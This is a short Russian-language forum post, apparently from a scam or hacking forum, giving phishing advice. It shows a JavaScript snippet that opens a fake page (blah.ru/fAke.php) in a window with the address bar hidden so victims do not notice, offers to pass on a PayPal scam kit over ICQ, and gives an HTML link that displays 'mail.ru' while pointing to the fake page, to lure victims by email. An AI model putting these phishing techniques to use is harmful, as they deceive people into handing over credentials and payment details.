Можно сделать так:
<script language="javascript">
window.open('blah.ru/fAke.php','',',Location=0, top=150');
</script>

Этим методом ты откроешь страницу без адресной строки, т.е. палиться не будет! А если надо у меня где-то офигенский скам валялся на платежную систему PayPal, там почти галимый ява скрипт, тока действует на ИЕ. Стучи в асю, отдам....


А разведи жертву письмом, вставь <a href="blah.ru/fake.php" title="mail.ru">mail.ru</a>

Усе!